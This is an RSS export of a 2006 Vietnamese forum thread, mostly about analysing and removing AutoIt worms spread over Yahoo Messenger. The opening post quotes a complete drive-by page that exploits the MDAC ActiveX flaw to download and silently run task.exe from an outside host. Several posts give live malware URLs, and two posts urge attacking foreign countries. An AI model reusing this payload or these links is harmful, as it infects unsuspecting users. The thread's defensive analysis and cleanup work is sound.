<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Lại thêm 1 thằng này mới điên"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/28.hva</link>
		<description><![CDATA[Latest messages posted in the topic "Lại thêm 1 thằng này mới điên"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Sáng vừa log vào YM lại thấy ngay thằng này, các bác xem hộ em nó là biến thể nào, gây hậu quả gì, em mới đang đi từ Basic nên chưa dám băm bổ nó ra.
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;
..:: Welcome ::..
&lt;/title&gt;
&lt;script language="VBScript"&gt;
    on error resume next
    dl = "http://viet8x.evonet.ro/task.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    &lt;/script&gt;
&lt;/head&gt;
&lt;body bgcolor="lavender"&gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;
&lt;center&gt;
&lt;h3&gt;You're welcome&lt;/h3&gt;
&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23065</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23065</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 13:00:43]]> GMT</pubDate>
				<author><![CDATA[ khomph]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ h**p://viet8x.evonet.ro/task.exe:

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>xxx</pre>
		</div>

<font color='orange'>PS: Do code có tính chất phá hoại nên HVA remove.
Thangdiablo</font>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23084</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23084</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 13:46:00]]> GMT</pubDate>
				<author><![CDATA[ mfeng]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Em thấy thằng này sử dụng lại mã khai thác lỗi MDAC của window đây mà

<span class="link"> http://www.milw0rm.com/exploits/2052</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23092</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23092</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 14:08:33]]> GMT</pubDate>
				<author><![CDATA[ letstart]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ To light.phoenix.
cho tớ hỏi là cậu dịch file task.exe sang .txt bằng CT gì thế]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23125</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23125</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 17:05:20]]> GMT</pubDate>
				<author><![CDATA[ eiseis]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ @eiseis:
Tớ dùng OllyDbg.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23160</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23160</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 19:34:05]]> GMT</pubDate>
				<author><![CDATA[ mfeng]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Ừm cứ cài Kaspersky là xong.Vừa vào hxxp://viet8x.evonet.ro hay minhnhut.be,và những trang trước nũa là Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23176</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23176</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 21:12:03]]> GMT</pubDate>
				<author><![CDATA[ kaisai]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">kaisai wrote:</cite><br>
		<blockquote>Ừm cứ cài Kaspersky là xong.Vừa vào<span class="link"> hxxp://viet8x.evonet.ro</span> hay minhnhut.be,và những trang trước nũa là Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá.&nbsp;
		</blockquote>
<span class="link"> hxxp://viet8x.evonet.ro</span> &lt;== cái này dạo này phát tán qua YIM dữ lắm anh em chú ý nó. Coi chừng bi luột á]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23182</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23182</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 21:53:14]]> GMT</pubDate>
				<author><![CDATA[ tinhtho_online]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[  adware từ trang này <span class="link"> hxxp://viet8x.evonet.ro</span>  nó copy nguyên source code của daokhuc.be chỉ sửa lại chút đỉnh,chắc  có "gà" nào bắt chước đây :|-))  .
<p></p>
		<cite class="blockquote">kaisai wrote:</cite><br>
		<blockquote> Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá.&nbsp;
		</blockquote>
 Vì mấy tay phát tán mấy con này còn "gà" quá nên mơi bị AV nó tóm đấy.
  :(( ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23189</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23189</link>
				<pubDate><![CDATA[Wed, 13 Sep 2006 22:46:46]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ @ light.phoenix,
cậu dùng CT Olly dịch ra code như thế, cậu có thể chỉ cho tớ sơ qua cách cậu đã làm không, tớ cũng có biết sơ qua về Olly rồi. thanks]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23244</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23244</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 02:16:41]]> GMT</pubDate>
				<author><![CDATA[ eiseis]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!!]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23273</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23273</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 08:45:02]]> GMT</pubDate>
				<author><![CDATA[ hoangtu_saint]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">hoangtu_saint wrote:</cite><br>
		<blockquote>tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!!&nbsp;
		</blockquote>
Hoan nghênh ý kiến này. <u><b>PHẢI CÓ TINH THẦN DÂN TỘC CHỨ !</b></u> Các bác cứ việc viết VR, cứ việc hack, cứ thoải mái crack nhưng nên phá của bọn nước ngoài cho anh em được nhờ. cho bọn nó biết thế nào là Việt Nam chứ quanh quẩn mấy cái của VN thì làm ăn gì.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23308</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23308</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 11:03:12]]> GMT</pubDate>
				<author><![CDATA[ ducnamnv]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">hoangtu_saint wrote:</cite><br>
		<blockquote>tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!!&nbsp;
		</blockquote>

<b><font color='red'>Không phá</font></b> ai cả. Muốn phá thì tự phá trên máy của mình. ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23313</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23313</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 11:18:30]]> GMT</pubDate>
				<author><![CDATA[ conmale]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <blockquote>mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình&nbsp;
		</blockquote>
Hic hic . . . truyền thống giao lưu hữu hảo với bạn bè trên thế giời từ xưa đến nay bị ông đè một phát bẹp như con tép.
<blockquote>Hoan nghênh ý kiến này&nbsp;
		</blockquote>
Hờ hờ . . . lại có người còn ủng hộ nữa này . . .
Những virus loại như thế này chỉ thể hiện một điều là sự kém hiểu biết, thích adua. Đầu thì rỗng nhưng muốn nhiều người biết đến . . . 
Ai còn gặp những con virus loại như thế này, hãy vào đây :<span class="link"> http://www.bkav.com.vn/frmThugopy.aspx</span>
Đưa link virus, link html và nhớ để lại email :D
Việc này không phải chỉ là giúp BKAV cập nhật virus mà còn đưa website chứa virus và black list, chuyển sang cho C14(C phòng chống tội phạm công nghệ cao). Thế nào cũng có vài chú ngu mặt ra.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23315</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23315</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 11:27:02]]> GMT</pubDate>
				<author><![CDATA[ phamquoc_truong]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <font size='+1'><b>Mới thêm một biến thể từ h**p://vuichoivn.com</b></font>

<b>[Mô tả]</b>
 - Ngay khi vào site trên, file guitangban.exe sẽ được thực thi. Đây là một virus viết bằng autoit, có các chức năng sau:
   + Gửi tin nhắn hàng loạt qua YIM, nội dung là một msg ngẫu nhiên trong số:
<blockquote>
- Moi lam website nay, moi nguoi cho y kien
- Nghe nhac Audition da^y
- Nghe nhac Viet Nam mien phi, moi lam hom qua
- Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen...
- Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao...
- Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon...
- Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo...
- Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi...
 - Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa...
 - Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?
&nbsp;
		</blockquote>
  Kèm thêm link tới h**p://vuichoivn.com

- Đặt các value trong registry:
<blockquote><font color='violet'>lQ đã remove code phá hoại.</font>
&nbsp;
		</blockquote>

 - Download file guitangban1.exe về, ghi ra file <font color='yellow'>taskmng.exe</font> đặt trong <b>%WINDOWS% </b>: <b><font color='yellow'>Đây là một trojan</font></b>

<b>[Một số thông tin ngoài lề]</b>
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>; &lt;AUT2EXE VERSION: 3.2.0.1&gt;

; ----------------------------------------------------------------------------
; &lt;AUT2EXE INCLUDE-START: D:\Documents and Settings\Le Quang Trung\Desktop\guitangban.au3&gt;
; ----------------------------------------------------------------------------

; &lt;AUT2EXE VERSION: 3.2.0.1&gt;

; ----------------------------------------------------------------------------
; &lt;AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3&gt;
; ----------------------------------------------------------------------------

;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------</pre>
		</div>

 -&gt;Code này được lấy từ code gốc của KVD
   - "Tác giả" của vuichoivn.com là Le Quang Trung  :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23332</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23332</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 12:22:40]]> GMT</pubDate>
				<author><![CDATA[ mfeng]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <b>[Mô tả]</b>
 - Ngay khi vào site trên, file guitangban.exe sẽ được thực thi. Đây là một virus viết bằng autoit, có các chức năng sau:
   

- Đặt các value trong registry:
<blockquote><font color='violet'>lQ đã remove code phá hoại.</font>
&nbsp;
		</blockquote>

 Đề nghị các anh ban quản trị diễn đàn để lại mấy cái đoạn mà VR nó ghi vào registry lại chứ xoá hết đi thì bọn em làm sao mà biết nó ghi gì vào registry mà xoá.Xoá gì thì xoá nhưng đừng xoá mấy đoạn đó chứ, bọn em k biết dịch ngược mã để tìm code nó là gì mà xoá đâu. Bạn em nhiều người k dùng BKAV nên k biết nó ghi gì vào registry thế thì làm sao mà gỡ nó đi đc.
Một chút ngu ý xin các bác quan tâm. Thanks !]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23355</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23355</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 13:08:55]]> GMT</pubDate>
				<author><![CDATA[ ducnamnv]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">phamquoc_truong wrote:</cite><br>
		<blockquote>
Những virus loại như thế này chỉ thể hiện một điều là sự kém hiểu biết, thích adua. Đầu thì rỗng nhưng muốn nhiều người biết đến . . . 
&nbsp;
		</blockquote>
Sao bác này nói chính xác quá,toàn là bọn loi choi ,bắt bọn này phạt vài nhát là lại kêu lên em hối hận quá à...nhưng em thích nhất là được cánh nhà báo đưa lên trang bìa cơ,chán như con gián. :|-)) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23359</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23359</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 13:20:00]]> GMT</pubDate>
				<author><![CDATA[ jamesmr]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Lại thêm 1 chú mới xuất hiện, đúng là công cụ tốt vào tay người xấu = đại phá hoại.
<blockquote><span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>HOT HOT HOT !!! Toan nhung girl xinh cua cac truong PTTH !!!<span class="link"> hxxp://www.traoluumoi.com/YMBEST/</span></pre>
		</div>&nbsp;
		</blockquote>
Các bác cao thủ xin chỉ giúp cho anh em phương pháp chung để khử cái bọn này đi với, khó chịu quá. Làm ơn chỉ cho em biết làm cách nào để biết con VR đó nó ghi những gì vào registry... đừng bảo em là đọc mã ASM nhé, em chịu  :(( ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23415</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23415</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 16:18:53]]> GMT</pubDate>
				<author><![CDATA[ ducnamnv]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Hướng dẫn remove virus trên vuichoivn.com:

1. Kill process guitangban.exe (file virus chính).
2. Kill process taskmng.exe (trojan)
2. Xoá file taskmng.exe trong %Windows%
3. Chạy file script để khắc phục các sửa đổi registry do virus gây ra: <span class="link"> http://www.bkav.com.vn/download/fix_reg.vbs</span>.

(Do virus này sửa đổi regisstry tương tự các biến thể trước đó, nên fix_reg của bkav vẫn sử dụng được.)


Với virus trên traoluumoi.com/YMBEST/:
Msg của virus này là:
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>HOT HOT HOT !!! Toan nhung girl xinh cua cac truong PTTH !!! ...</pre>
		</div>
1.  Kill process YMBEST.exe
2. Xoá file YMBEST.exe trong %Windows%
3. Fix reg tương tự như trên.

<b><font color='red'>Chú ý:</font></b>
1. IE chưa fix lỗi MS06-014 sẽ bị nhiễm virus ngay khi vào các website chứa virus trên. Download bản fix MS06-014 tại <span class="link"> http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx</span>
2. Người dùng firefox không bị ảnh hưởng.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23416</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23416</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 16:22:41]]> GMT</pubDate>
				<author><![CDATA[ mfeng]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Toi cung bi dinh thang nay roi. Nhung toi da diet duoc no roi hu hon.

lQ: 
- Yêu cầu đánh TV.
- <b><font color='red'>Cảnh cáo lần thứ 1.</font></b>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23421</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23421</link>
				<pubDate><![CDATA[Thu, 14 Sep 2006 16:42:35]]> GMT</pubDate>
				<author><![CDATA[ hth_vn]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Đọc code mấy con AutoIt mới thấy các đồng chí sài lại chẳng có chút sáng tạo nào cả, vẫn bài bản như cũ, k có gì tiến bộ, sáng tạo. chỉ có đồng chí nghĩ ra gaixinh và đồng chí cải biển random cái mess là có sáng tạo thôi. Hy vọng mấy chú đú đởn đừng viết mấy con như thế này nữa mà làm mất công trả lời của các bác ligh.phoenix, ......
Tuy nhiên, cũng phải cảm ơn các bác, nhờ vụ này mà em biết AutoIt nó hay đến thế, mở mắt được nhiều thứ.Hỳ hục tìm kiếm, thử nghiệm cuối cùng cũng khôn ra.
Các bác sao không dùng chính autoit để viết chương trình diệt VR trên Y!M đi nhỉ :?:) . Công cụ này viết cái đó cũng dễ mà.  :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23565</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23565</link>
				<pubDate><![CDATA[Fri, 15 Sep 2006 11:45:03]]> GMT</pubDate>
				<author><![CDATA[ ducnamnv]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">ducnamnv wrote:</cite><br>
		<blockquote>Đọc code mấy con AutoIt mới thấy các đồng chí sài lại chẳng có chút sáng tạo nào cả, vẫn bài bản như cũ, k có gì tiến bộ, sáng tạo. chỉ có đồng chí nghĩ ra gaixinh và đồng chí cải biển random cái mess là có sáng tạo thôi. Hy vọng mấy chú đú đởn đừng viết mấy con như thế này nữa mà làm mất công trả lời của các bác ligh.phoenix, ......
 &nbsp;
		</blockquote>

Đúng rồi, nếu muốn nổi tiếng thì tham gia vào virus writer contest chứ đừng có copy / paste như thế phiền toái lắm]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23630</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23630</link>
				<pubDate><![CDATA[Fri, 15 Sep 2006 17:51:50]]> GMT</pubDate>
				<author><![CDATA[ Harvestmoon]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ em dow quá trời cái web anh light đưa mà sao chưa xoá được cái VR hxxp://www.traoluumoi.com/YMBEST/   vậy chỉ em với huhu]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23636</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23636</link>
				<pubDate><![CDATA[Fri, 15 Sep 2006 18:38:59]]> GMT</pubDate>
				<author><![CDATA[ night_hero]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ rồi rồi em hiểu rồi ...tại em nood hì hì giet được rồi cám ơn nhiều.........]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23642</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23642</link>
				<pubDate><![CDATA[Fri, 15 Sep 2006 19:21:40]]> GMT</pubDate>
				<author><![CDATA[ night_hero]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Nhức đầu quá, toàn mấy thằng nhóc phá hoại chẳng được cái tích sự gì cả, hom nay nguyên 1 đám bạn trong list YM của tôi nhiễm, mở YM ra nhận được 1 đống spam mesage nhìn chong mặt, mở ra view code thấy y chang như gái xinh chẳng có gì hay ho cả]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23673</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23673</link>
				<pubDate><![CDATA[Fri, 15 Sep 2006 22:56:09]]> GMT</pubDate>
				<author><![CDATA[ sptit_145]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Nói chung cứ thủ sẳn 1 user trong nhóm administrator của MS windows, 1 cái soft có chức năng tựa tựa ice sword, rồi ngồi mà mò registry.:D. ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23693</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23693</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 01:40:40]]> GMT</pubDate>
				<author><![CDATA[ tmd]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Bây giờ, chắc ăn đừng có click vô những link "lạ lạ", nếu ko thì ăn 1 ổ virus luôn đó  :lol:) 

hic, với những tin nhắn thế này, người ko kinh nghiệm sẽ click vô, nên sức lây lan của nó nhanh quá  :|-)) 

"Cac ban co the tranh bi nhiem cac loai virus online gan day bang cach update Windows . Vao day de biet cach Update Win ma ko can ban quyen Windows xin:<span class="link"> <span class="link"> http://www.geocities.co.jp/ie_protector</span></span> " 

"Let's vote for Miss Vietnam - Mai Phuong Thuy - for the upcoming Miss World championship : <span class="link"> http://www.geocities.co.jp/thanatos18388</span> !! "  ,, tin nhắn này tôi nhận nhiều nhất từ nick của các bạn thân,... vote đi, vote rồi ăn virus luôn  :lol:)   :lol:) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23700</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23700</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 02:02:47]]> GMT</pubDate>
				<author><![CDATA[ havythoai]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ 
Bác post link thì cũng nên sửa nó đi chút cho người khác khỏi "lỡ tay" he he.... bấm vào phát thấy Kaspersky la lối om xòm
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23733</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23733</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 10:26:09]]> GMT</pubDate>
				<author><![CDATA[ kara_men]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Đây là thông báo của KAV sau khi vào link <span class="link"> http://stb.tsukuba-ac.jp/tranquocthang/</span>
mà vào bằng FireFox đàng hoàng nha.Ai dám bảo FireFox không bị dính nào, may có KAV.
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>Kaspersky Anti-Virus 6.0
The requested URL<span class="link"> http://stb.tsukuba-ac.jp/tranquocthang/activex.html</span> is infected with Exploit.JS.ADODB.Stream.e virus</pre>
		</div>
Lại thêm 1 AutoIT híc loạn mất rồi

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23734</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23734</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 10:29:01]]> GMT</pubDate>
				<author><![CDATA[ kaisai]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[  Thôi hổng chơi với mấy Pác nữa. hic]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23740</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23740</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 10:46:25]]> GMT</pubDate>
				<author><![CDATA[ tosrita]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">kara_men wrote:</cite><br>
		<blockquote>
Bác post link thì cũng nên sửa nó đi chút cho người khác khỏi "lỡ tay" he he.... bấm vào phát thấy Kaspersky la lối om xòm
&nbsp;
		</blockquote>
Phải để link cho mọi người biết đó là Virus mà né ... ! Tôi đã viết cảnh báo như thế mà có ai click vào nữa thì tôi cũng bó tay .  :lol:) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23749</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23749</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 11:28:05]]> GMT</pubDate>
				<author><![CDATA[ havythoai]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">havythoai wrote:</cite><br>
		<blockquote>Bây giờ, chắc ăn đừng có click vô những link "lạ lạ", nếu ko thì ăn 1 ổ virus luôn đó  :lol:) 

hic, với những tin nhắn thế này, người ko kinh nghiệm sẽ click vô, nên sức lây lan của nó nhanh quá  :|-)) 

"Cac ban co the tranh bi nhiem cac loai virus online gan day bang cach update Windows . Vao day de biet cach Update Win ma ko can ban quyen Windows xin:<span class="link"> <span class="link"> http://www.geocities.co.jp/ie_protector</span></span> " 

"Let's vote for Miss Vietnam - Mai Phuong Thuy - for the upcoming Miss World championship : <span class="link"> http://www.geocities.co.jp/thanatos18388</span> !! "  ,, tin nhắn này tôi nhận nhiều nhất từ nick của các bạn thân,... vote đi, vote rồi ăn virus luôn  :lol:)   :lol:) &nbsp;
		</blockquote>
Virus này tiến bộ hơn rồi  :mrgreen: nó cho mấy người ko rành lắm bị dính  :mrgreen:  nhận đc 2 câu từ thằng bạn
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>cool girls :<span class="link"> http://www.geocities.co.jp/thanatos18388</span> :x:x:x:x:x</pre>
		</div>
Cái này hay hơn
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
